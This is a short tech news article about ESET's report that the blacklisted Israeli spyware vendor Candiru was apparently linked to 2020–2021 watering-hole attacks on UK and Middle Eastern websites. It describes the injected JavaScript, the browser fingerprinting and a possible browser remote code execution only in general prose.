Newspress-releaseSecurity & VulnerabilityTechUpdate

Why did candiru get blacklisted by the US Government?

New evidence suggests that Israeli spyware vendor Candiru, which was recently added to the US government’s economic blacklist, carried out “watering hole” assaults against high-profile targets in the UK and the Middle East.

Why did candiru get blacklisted by the US Government? 2

The strategic web compromises are thought to have happened in two waves, the first beginning in March 2020 and ending in August 2020, and the second beginning in January 2021 and ending in early August 2021, when the malicious scripts were removed from the targeted domains.

Watering hole attacks are a type of highly targeted intrusion in which a specific group of end-users is infected via backdooring websites that the group is known to visit with the purpose of gaining access to their computers for further exploitation.

The original attack chains involved injecting JavaScript code into websites from a remote attacker-controlled domain that was designed to collect and exfiltrate I.P. geolocation and system information about the victim machine, but only if the operating system in question was either Windows or macOS, implying that the campaign was designed to target computers rather than mobile devices. The final stage resulted in a possible browser remote code execution hack, allowing the attackers to take control of the computers.

The second wave, which began in January 2021, was more stealthy, as the malicious code was embedded in genuine WordPress scripts (“wp-embed.min.js”) rather than being added directly to the main HTML page, utilising the mechanism to load a script from a server under the attacker’s control. Furthermore, the fingerprinting script captured the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins in addition to system metadata.

Why did candiru get blacklisted by the US Government? 3

The specific exploit and payload sent have yet to be determined. “This demonstrates that the operators have chosen to focus their operations and do not want to burn their zero-day exploits,” stated ESET malware researcher Matthieu Faou.

The campaign’s links to Candiru stem from the fact that some of the attackers’ command-and-control servers are similar to domains previously identified as belonging to the Israeli firm, not to mention the fact that it employs browser-based remote code execution exploits, raising the possibility that “the operators of the watering holes are Candiru customers.”

Nidhi Khandelwal

Nidhi is a tech news/research contributor at TheDigitalHacker. She publishes about techno geopolitics, privacy, and data breach.
Back to top button
Close
Close